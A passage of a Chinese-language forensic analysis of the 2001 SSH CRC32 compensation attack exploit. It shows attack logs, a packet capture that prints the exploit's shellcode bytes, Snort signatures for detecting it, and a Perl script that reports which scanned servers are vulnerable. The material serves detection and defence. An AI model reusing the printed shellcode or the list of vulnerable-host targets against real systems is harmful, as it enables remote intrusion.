18:48:08 victim sshd[9588]: log: Connection from 10.10.10.10 port 33375 Nov 1 18:48:08 victim sshd[9587]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:08 victim sshd[9589]: log: Connection from 10.10.10.10 port 33376 Nov 1 18:48:08 victim sshd[9588]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:09 victim sshd[9590]: log: Connection from 10.10.10.10 port 33377 Nov 1 18:48:09 victim sshd[9589]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:09 victim sshd[9591]: log: Connection from 10.10.10.10 port 33378 Nov 1 18:48:09 victim sshd[9590]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:09 victim sshd[9592]: log: Connection from 10.10.10.10 port 33379 Nov 1 18:48:09 victim sshd[9591]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:10 victim sshd[9592]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:10 victim sshd[9593]: log: Connection from 10.10.10.10 port 33380 Nov 1 18:48:10 victim sshd[9594]: log: Connection from 10.10.10.10 port 33381 Nov 1 18:48:10 victim sshd[9593]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:11 victim sshd[9595]: log: Connection from 10.10.10.10 port 33382 Nov 1 18:48:11 victim sshd[9594]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:11 victim sshd[9596]: log: Connection from 10.10.10.10 port 33383 Nov 1 18:48:11 victim sshd[9597]: log: Connection from 10.10.10.10 port 33384 Nov 1 18:48:11 victim sshd[9596]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:12 victim sshd[9598]: log: Connection from 10.10.10.10 port 33385 Nov 1 18:48:12 victim sshd[9597]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:12 victim sshd[9599]: log: Connection from 10.10.10.10 port 33386 Nov 1 18:48:12 victim sshd[9598]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:12 victim sshd[9600]: log: Connection from 10.10.10.10 port 33387 Nov 1 18:48:12 victim sshd[9599]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:13 victim sshd[9601]: log: Connection from 10.10.10.10 port 33388 Nov 1 18:48:13 victim sshd[9602]: log: Connection from 10.10.10.10 port 33389 Nov 1 18:48:13 victim sshd[9603]: log: Connection from 10.10.10.10 port 33390 Nov 1 18:48:14 victim sshd[9604]: log: Connection from 10.10.10.10 port 33391 Nov 1 18:48:14 victim sshd[9605]: log: Connection from 10.10.10.10 port 33392 Nov 1 18:48:15 victim sshd[9606]: log: Connection from 10.10.10.10 port 33393 Nov 1 18:48:15 victim sshd[9605]: fatal: Local: Corrupted check bytes on input. Nov 1 18:48:15 victim sshd[9607]: log: Connection from 10.10.10.10 port 33394 Nov 1 18:48:16 victim sshd[9608]: log: Connection from 10.10.10.10 port 33395 Nov 1 18:48:16 victim sshd[9609]: log: Connection from 10.10.10.10 port 33396 Nov 1 18:48:16 victim sshd[9610]: log: Connection from 10.10.10.10 port 33397 Nov 1 18:48:17 victim sshd[9611]: log: Connection from 10.10.10.10 port 33398 Nov 1 18:48:17 victim sshd[9611]: fatal: Local: Corrupted check bytes on input. Nov 1 18:48:17 victim sshd[9612]: log: Connection from 10.10.10.10 port 33399 Nov 1 18:48:18 victim sshd[9613]: log: Connection from 10.10.10.10 port 33400 Nov 1 18:48:18 victim sshd[9614]: log: Connection from 10.10.10.10 port 33401 Nov 1 18:58:18 victim sshd[9614]: fatal: Timeout before authentication. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 注意日志條目的最后一條，如果成功利用此漏洞被入侵，認(rèn)證過(guò)程就會(huì)停止，因?yàn)? 此時(shí)SHELLCODE的后門程序已經(jīng)執(zhí)行，這樣你可以連接端口進(jìn)行任何操作。唯一的問(wèn)題是，SSH守護(hù)程序(至少SSH.com 1.2.31)會(huì)由于認(rèn)證過(guò)程不完整而超時(shí)，導(dǎo)致關(guān)閉開(kāi)啟的SHELL。一般在監(jiān)聽(tīng)shell的父進(jìn)程關(guān)閉只前會(huì)有10分鐘時(shí)間空域。網(wǎng)絡(luò)通信信息分析 ===================== 在這里使用了Tcpdump來(lái)截獲上面的攻擊行為，記錄信息在sshdx.dump，可以被用來(lái)IDS入侵檢測(cè)系統(tǒng)獲得攻擊標(biāo)志信息。如果你的IDS系統(tǒng)不支持tcpdump文件，你可以使用"tcpreplay"[12]來(lái)轉(zhuǎn)換tcpdump信息。 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # tcpdump -s1500 -w sshdx.dump ip host 10.10.10.3 & =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 這樣可以很容易的查看SSH守護(hù)程序產(chǎn)生的多個(gè)連接信息，使用"ngrep"[5]工具可以辨認(rèn)出最后連接和插入SHELLCODE的暴力破解攻擊信息： =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= . . . T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP] SSH-1.5-1.2.31. T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP] SSH-1.5-OpenSSH_2.2.0p1. T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP] ............GA..@.......%....`..P.....D&..2.+7#...1!?..c.r).8.^.h..... ..I..b6..9.f........N..0....:BAh@s.e...H......(.D2.Zg......#.......\.j W...O$....6.......$...V..;...U.@Y.K2.p<\..o..?..l..........p.K<s..,.. .@7.wBBy......1.i..%".....Gg.G.t(......M........[.......J......<. T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP] ............GA..@.....`G.Fg.g.!.i.}..........._.e....=../..6....;....) T..... c...#W.\wve.cy .n.....q.Sc....}..".N.G.w"....n.../#.....8x..&.Z ....Q/.......8.. T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP] .........4.. T 10.10.10.10:32957 -> 10.10.10.3:2222 [A] ..W...2.......2.......2.......2.......2.......2.......2.......2....... 2.......2.......2.......2.......2.......2.......2.......2.......2 .... ..2!......2$......2%......2(......2)......2,......2-......20......21.. ....24......25......28......29......2<......2=......2@......2A......2D ......2E......2H......2I......2L......2M......2P......2Q......2T...... 2U......2X......2Y......2\......2]......2`......2a......2d......2e.... ..2h......2i......2l......2m......2p......2q......2t......2u......2x.. ....2y......2 ......2}......2.......2.......2.......2.......2.......2. ......2.......2.......2.......2.......2.......2.......2.......2....... 2.......2.......2.......2.......2.......2.......2.......2.......2..... ..2.......2.......2.......2.......2.......2.......2.......2.......2... ....2.......2.......2.......2.......2.......2.......2.......2.......2. ......2.......2.......2.......2.......2.......2.......2.......2....... 2.......2.......2.......2.......2.......2.......2.......2.......2..... ..2.......2.......2.......2.......2.......2.......3.......3.......3... ....3.......3.......3.......3.......3.......3.......3.......3.......3. ......3.......3.......3.......3.......3 ......3!......3$......3%...... 3(......3)......3,......3-......30......31......34......35......38.... ..39......3<......3=......3@......3A......3D......3E......3H......3I.. ....3L......3M......3P......3Q......3T......3U......3X......3Y......3\ ......3]......3`......3a......3d........1...p}.@ T 10.10.10.10:32957 -> 10.10.10.3:2222 [A] ......3i......3l......3m......3p......3q......3t......3u......3x...... 3y......3 ......3}......3.......3.......3.......3.......3.......3..... ..3.......3.......3.......3.......3.......3.......3.......3.......3... ....3.......3.......3.......3.......3.......3.......3.......3.......3. ......3.......3.......3.......3.......3.......3.......3.......3....... 3.......3.......3.......3.......3.......3.......3.......3.......3..... ..3.......3.......3.......3.......3.......3.......3.......3.......3... ....3.......3.......3.......3.......3.......3.......3.......3.......3. ......3.......3.......3.......3.......3.......4.......4.......4....... 4.......4.......4.......4.......4.......4.......4.......4.......4..... ..4.......4.......4.......4.......4 ......4!......4$......4%......4(.. ....4)......4,......4-......40......41......44......45......48......49 ......4<......4=......4@......4A......4D......4E......4H......4I...... 4L......4M......4P......4Q......4T......4U......4X......4Y......4\.... ..4]......4`......4a......4d......4e......4h......4i......4l......4m.. ....4p......4q......4t......4u......4x......4y......4 ......4}......4. ......4.......4.......4.......4.......4.......4.......4.......4....... 4.......4.......4.......4.......4.......4.......4.......4.......4..... ..4.......4.......4.......4.......4.......4.......4.......4.......4... ....4.......4.......4.......4.......4.......4.......4.......4.......4. ......4.......4.......4.......4.........1...p}.@ . . . T 10.10.10.10:32957 -> 10.10.10.3:2222 [A] ...................................................................... ...................................................................... ...................................................................... ...................................................................... ...................................................................... ...................................................................... ...................................................................... ...................................................................... .....................1..f..1...C.].C.].K.M..M...1..E.Cf.].f.E.09.M..E. .E..E.....M.....CC....C....1..?......A....^.u.1..F..E......M..U....... ./bin/sh.h0h0h0, 7350, zip/TESO!...................................... ...................................................................... ...................................................................... ...................................................................... ...................................................................... ...................................................................... ...................................................................... ...................................................................... ...................................................................... ...................................................................... ........................................1...p}.@ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 這樣針對(duì)這個(gè)攻擊程序你可以匹配如下字符串"h0h0h0, 7350, zip/TESO!" [7] 和NOP等。下面的特征字符串由Marty Roesch 和 Brian Caswell開(kāi)發(fā)并可使用在Snort v1.8 或者更高的版本[6]： =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \ 　 (msg:"EXPLOIT ssh CRC32 overflow /bin/sh"; \ 　 flags:A+; content:"/bin/sh"; \ 　 reference:bugtraq,2347; reference:cve,CVE-2001-0144; \ 　 classtype:shellcode-detect;) alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \ 　 (msg:"EXPLOIT ssh CRC32 overflow filler"; \ 　 flags:A+; content:" 00 00 00 00 00 00 00 00 00 00 00 00 00 "; \ 　 reference:bugtraq,2347; reference:cve,CVE-2001-0144; \ 　 classtype:shellcode-detect;) alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \ 　 (msg:"EXPLOIT ssh CRC32 overflow NOOP"; \ 　 flags:A+; content:" 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 "; \ 　 reference:bugtraq,2347; reference:cve,CVE-2001-0144; \ 　 classtype:shellcode-detect;) alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \ 　 (msg:"EXPLOIT ssh CRC32 overflow"; \ 　 flags:A+; content:" 00 01 57 00 00 00 18 "; offset:0; depth:7; \ 　 content:" FF FF FF FF 00 00 "; offset:8; depth:14; \ 　 reference:bugtraq,2347; reference:cve,CVE-2001-0144; \ 　 classtype:shellcode-detect;) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 鑒別你的主機(jī)是否存在此漏洞 =========================== 你可以使用Jeremy Mates' scan_ssh.pl[8] 和 Niels Provos' ScanSSH scanner[9] 寫(xiě)的腳本來(lái)鑒別SSH服務(wù)和它們的版本。 Russell Fulton 也公布了一個(gè)腳本程序Argus[10]用來(lái)處理日志，包含在下面的附錄中。 ---------------------------------------------------------------------------- 參考 ======== [1] Portable Linux Amazing CD (PLAC) v2.9.1pre2, by Fred Cohen 　 http://www.all.net/ForensiX/plac.html [2] Netcat, by der Hobbit 　 http://www.l0pht.com/~weld/netcat/ [3] Reverse Engineer's Query Tool 　 http://packetstormsecurity.org/linux/reverse-engineering/reqt-0.7f.tar.gz [4] LiSt Open Files (lsof) 　 http://sunsite.securitycentralhq.com/mirrors/security/lsof/lsof.tar.gz [5] ngrep, by Jordan Ritter 　 http://www.packetfactory.net/projects/ngrep/ [6] Snort 　 http://www.snort.org/ [7] 7350.org / 7350 　 http://www.7350.org/ 　 http://www.team-teso.org/about.php (see the bottom) [8] Jeremy Mates 提供的ssh_scan.pl 　 http://sial.org/code/perl/scripts/ssh_scan.pl.html [9] Niels Provos提供的ScanSSH 掃描程序　 http://www.monkey.org/~provos/scanssh/ [10] Argus - 網(wǎng)絡(luò)傳輸審核工具　 http://www.pl.freebsd.org/es/ports/net.html#argus-1.8.1 [11] tcpdump 　 http://staff.washington.edu/dittrich/misc/sshdx.dump [12] tcpreplay 　 http://packages.debian.org/testing/net/tcpreplay.html Appendix A ========== 兩個(gè)掃描腳本如下 =-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= #!/usr/bin/perl # # ssh-report # # Dave Dittrich <dittrich@cac.washington.edu> # Thu Nov 8 21:39:20 PST 2001 # # Process output of scans for SSH servers, with version identifying # information, into two level break report format by SSH version. # # This script operates on a list of scan results that look # like this: # # % cat scanresults # 10.0.0.1 beavertail.dept.foo.edu SSH-1.5-1.2.31 # 10.0.0.2 lumpysoup.dept.foo.edu SSH-1.5-1.2.31 # 10.0.0.3 marktwain.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2 # 10.0.0.4 junebug.dept.foo.edu SSH-1.5-1.2.31 # 10.0.0.10 calvin.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2 # 10.0.0.11 hobbes.dept.foo.edu SSH-1.99-OpenSSH_2.1.1 # 10.0.0.20 willow.dept.foo.edu SSH-1.99-OpenSSH_2.9p2 # 10.0.0.21 berry.dept.foo.edu SSH-1.99-OpenSSH_2.9p2 # 10.0.0.23 whimpy.dept.foo.edu SSH-1.99-OpenSSH_2.9p2 # # The resulting report (without the "-a" flag) will look like this: # # % ssh-report < scanresults # # SSH-1.5-1.2.31 (affected) # beavertail.dept.foo.edu(10.0.0.1) # lumpysoup.dept.foo.edu(10.0.0.2) # junebug.dept.foo.edu(10.0.0.4) # # # SSH-1.99-OpenSSH_2.1.1 (affected) # hobbes.dept.foo.edu(10.0.0.11) # # By default, this script will only report on those systems that # are running potentially vulnerable SSH servers. Use the "-a" # option to report on all servers. Use "grep -v" to filter out # hosts before you run them through this reporting script. # # SSH servers are considered "affected" if they are known, by being # listed in one or more of the following references, to have the crc32 # compensation attack detector vulnerability: # # http://www.kb.cert.org/vuls/id/945216 # http://www.securityfocus.com/bid/2347/ # http://xforce.iss.net/alerts/advise100.php # http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm # # You also may need to adjust the logic below to lump systems # into the "Unknown" category correctly (e.g., if your server # has a custom version string, access control, etc.) # # The list below of servers and potential vulnerability was derived by # summarizing existing versions on a set of production networks and # using the advisories and reference material listed above. You # should update this list as new information is obtained, or if new # versions of the SSH server are found on your network. %affected = ( 'Unknown', 'unknown', 'SSH-1.4-1.2.14', 'not affected', 'SSH-1.4-1.2.15', 'not affected', 'SSH-1.4-1.2.16', 'not affected', 'SSH-1.5-1.2.17', 'not affected', 'SSH-1.5-1.2.18', 'not affected', 'SSH-1.5-1.2.19', 'not affected', 'SSH-1.5-1.2.20', 'not affected', 'SSH-1.5-1.2.21', 'not affected', 'SSH-1.5-1.2.22', 'not affected', 'SSH-1.5-1.2.23', 'not affected', 'SSH-1.5-1.2.24', 'affected', 'SSH-1.5-1.2.25', 'affected', 'SSH-1.5-1.2.26', 'affected', 'SSH-1.5-1.2.27', 'affected', 'SSH-1.5-1.2.28', 'affected', 'SSH-1.5-1.2.29', 'affected', 'SSH-1.5-1.2.30', 'affected', 'SSH-1.5-1.2.31', 'affected', 'SSH-1.5-1.2.31a', 'not affected', 'SSH-1.5-1.2.32', 'not affected', 'SSH-1.5-1.3.7', 'not affected', 'SSH-1.5-Cisco-1.25', 'unknown', 'SSH-1.5-OSU_1.5alpha1', 'unknown', 'SSH-1.5-OpenSSH-1.2', 'affected', 'SSH-1.5-OpenSSH-1.2.1', 'affected', 'SSH-1.5-OpenSSH-1.2.2', 'affected', 'SSH-1.5-OpenSSH-1.2.3', 'affected', 'SSH-1.5-OpenSSH_2.5.1', 'not affected', 'SSH-1.5-OpenSSH_2.5.1p1', 'not affected', 'SSH-1.5-OpenSSH_2.9p1', 'not affected', 'SSH-1.5-OpenSSH_2.9p2', 'not affected', 'SSH-1.5-RemotelyAnywhere', 'not affected', 'SSH-1.99-2.0.11', 'affected w/Version 1 fallback', 'SSH-1.99-2.0.12', 'affected w/Version 1 fallback', 'SSH-1.99-2.0.13', 'affected w/Version 1 fallback', 'SSH-1.99-2.1.0.pl2', 'affected w/Version 1 fallback', 'SSH-1.99-2.1.0', 'affected w/Version 1 fallback', 'SSH-1.99-2.2.0', 'affected w/Version 1 fallback', 'SSH-1.99-2.3.0', 'affected w/Version 1 fallback', 'SSH-1.99-2.4.0', 'affected w/Version 1 fallback', 'SSH-1.99-3.0.0', 'affected w/Version 1 fallback', 'SSH-1.99-3.0.1', 'affected w/Version 1 fallback', 'SSH-1.99-OpenSSH-2.1', 'affected', 'SSH-1.99-OpenSSH_2.1.1', 'affected', 'SSH-1.99-OpenSSH_2.2.0', 'affected', 'SSH-1.99-OpenSSH_2.2.0p1', 'affected', 'SSH-1.99-OpenSSH_2.3.0', 'not affected', 'SSH-1.99-OpenSSH_2.3.0p1', 'not affected', 'SSH-1.99-OpenSSH_2.5.1', 'not affected', 'SSH-1.99-OpenSSH_2.5.1p1', 'not affected', 'SSH-1.99-OpenSSH_2.5.1p2', 'not affected', 'SSH-1.99-OpenSSH_2.5.2p2', 'not affected', 'SSH-1.99-OpenSSH_2.9.9p2', 'not affected', 'SSH-1.99-OpenSSH_2.9', 'not affected', 'SSH-1.99-OpenSSH_2.9p1', 'not affected', 'SSH-1.99-OpenSSH_2.9p2', 'not affected', 'SSH-1.99-OpenSSH_3.0p1', 'not affected', 'SSH-2.0-1.1.1', 'unknown', 'SSH-2.0-2.3.0', 'affected w/Version 1 fallback', 'SSH-2.0-2.4.0', 'affected w/Version 1 fallback', 'SSH-2.0-3.0.0', 'affected w/Version 1 fallback', 'SSH-2.0-3.0.1', 'affected w/Version 1 fallback', 'SSH-2.0-OpenSSH_2.5.1p1', 'not affected', 'SSH-2.0-OpenSSH_2.5.2p2', 'not affected', 'SSH-2.0-OpenSSH_2.9.9p2', 'not affected', 'SSH-2.0-OpenSSH_2.9p2', 'not affected', ); # Make SURE you read the code first. &IKnowWhatImDoing(); $all++, shift(@ARGV) if $ARGV[0] eq "-a"; while (<>) { 　　　 chop; 　　　 s/\s+/ /g; 　　　 ($ip, $host, $version) = split(' ', $_); 　　　 # Adjust this to identify other strings reported 　　　 # by servers that have access restrictions, etc. 　　　 # in place and do not show a specific version number. 　　　 # They all fall under the category "Unknown" in this case. 　　　 $version = "Unknown" 　　　　　　　 if ($version eq "Couldn't" 　　　　　　　　　 $version eq "Unknown" 　　　　　　　　　 $version eq "You" 　　　　　　　　　 $version eq "timeout"); 　　　 $server = $host; } foreach $i (sort keys %server) { 　　　 ($version,$ip) = split(":", $i); 　　　 next if ($affected eq "not affected" && ! $all); 　　　 printf("\n\n%s (%s)\n", $version, $affected) 　　　　　　　 if ($curver ne $version); 　　　 $curver = $version; 　　　 print " " . $server . "($ip)\n"; } exit(0); sub IKnowWhatImDoing { 　　　 local $IKnowWhatImDoing = 0; 　　　 # Uncomment the following line to make this script work. 　　　 # $IKnowWhatImDoing++; 　　　 die "I told you to read the code first, didn't I?\n" 　　　　　　　 unless $IKnowWhatImDoing; 　　　 return; } =-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 標(biāo)簽：對(duì)于SSH crc32 compensation attack detector exploit 的區(qū)分上一篇：使用Resin在NT環(huán)境下設(shè)置JSP環(huán)境！下一篇：用腳本語(yǔ)言讀取客戶端注冊(cè)表	推薦資訊總?cè)藲獍?/span> 1PS提示：因?yàn)閳D層已鎖定，無(wú)法編輯圖層的處理方法 2Adobe Illustrator CS5 序列號(hào)大全 3picacg蘋(píng)果版怎么找不到\|picacg ios版是不是下架了介紹 4ACDsee注冊(cè)碼免費(fèi)分享（含ACDsee18、ACDsee10等版本） 5蘋(píng)果iphone自動(dòng)時(shí)間不準(zhǔn)確的多種校正方法 6PDF瀏覽器能看3D文件嗎？PDF瀏覽器看3D文件圖文詳細(xì)教程 7Potato(馬鈴薯聊天)怎么注冊(cè)不了\|Potato不能注冊(cè)處理方法介紹 8Potato(土豆聊天)怎么換頭像\|Potato app更改頭像方法介紹 9ipad版office如何激活? office365激活的圖文說(shuō)明教程 10最新的Adobe Illustrator CS4序列號(hào)大全 11Mac怎么通過(guò)設(shè)置VPN來(lái)登錄youtube等國(guó)外網(wǎng)站 12qq郵件是否已讀怎么看 QQ郵箱已經(jīng)發(fā)出去的郵件怎么知道對(duì)方是否已經(jīng)查看 1支付寶怎么交學(xué)費(fèi)，支付寶教育繳費(fèi)圖文說(shuō)明教程 2高鐵兒童票網(wǎng)上怎么買，網(wǎng)上買高鐵兒童票具體流程 3京東微笑面單是什么，京東微笑快遞單有什么用 4GG廣告申請(qǐng) 5新手誤區(qū)：揭露seo反鏈工具的真實(shí)面目 6被降權(quán)問(wèn)題淺談百度頁(yè)面權(quán)重 72014年9月百度綠蘿算法再度升級(jí) 8百度降權(quán)并不可怕 9淺談增加網(wǎng)站外部鏈接的方法 10提高谷歌聯(lián)盟Adsense收入4種方法 11百度減少收錄是什么原因？ 12恢復(fù)百度權(quán)重的一些心得最新教程本月人氣 1JSP計(jì)數(shù)器的制作 2開(kāi)發(fā)J2EE應(yīng)用的要領(lǐng) 3設(shè)計(jì)模式之代理模式(Proxy) 4jspSmartUpload上傳下載全攻略 5一段顯示論壇貼子的程序 6用PHP制作靜態(tài)網(wǎng)站的模板框架(二) 7J2EE編程起步 8避開(kāi)重復(fù)定義數(shù)組 9淺析.NET開(kāi)發(fā)中代理模式的使用 10JSP通過(guò)JDBC與Oracle相連 11J2EE相關(guān)設(shè)計(jì)模式討論 12用PHP制作靜態(tài)網(wǎng)站的模板框架(一) 1qq瀏覽器安全網(wǎng)址認(rèn)證如何打開(kāi) qq瀏覽器安全網(wǎng)址認(rèn)證打開(kāi)圖文說(shuō)明教程 2用WPS表格2013統(tǒng)計(jì)所需鈔票張數(shù) 3uc瀏覽器愚人節(jié)新版最搞siao技巧玩法總結(jié) 4win10手機(jī)瀏覽器上手界面清新簡(jiǎn)潔 5用微信如何發(fā)送文件手機(jī)微信發(fā)送文件方法圖文詳細(xì)說(shuō)明 6阿里旺旺如何加好友？淘寶阿里旺旺加好友步驟 7電腦瀏覽器下載排行榜2017 官方瀏覽器下載排行榜前10名 8WPS表格2013制作音序檢測(cè)評(píng)分問(wèn)卷 9wps表格如何算平均值 10手機(jī)qq視頻美顏如何打開(kāi) 手機(jī)qq視頻美顏打開(kāi)圖文說(shuō)明教程圖 11支付寶錢包搶紅包時(shí)刻表手機(jī)支付寶搶紅包時(shí)間 12高德地圖如何定位？高德地圖定位方法
相關(guān)文章 JSP計(jì)數(shù)器的制作開(kāi)發(fā)J2EE應(yīng)用的要領(lǐng) 設(shè)計(jì)模式之代理模式(Proxy) jspSmartUpload上傳下載全攻略一段顯示論壇貼子的程序用PHP制作靜態(tài)網(wǎng)站的模板框架(二) J2EE編程起步避開(kāi)重復(fù)定義數(shù)組淺析.NET開(kāi)發(fā)中代理模式的使用 JSP通過(guò)JDBC與Oracle相連 J2EE相關(guān)設(shè)計(jì)模式討論用PHP制作靜態(tài)網(wǎng)站的模板框架(一)

<tr id="8iiii"></tr>

<tfoot id="8iiii"></tfoot>

<tr id="8iiii"></tr>

<tr id="8iiii"></tr>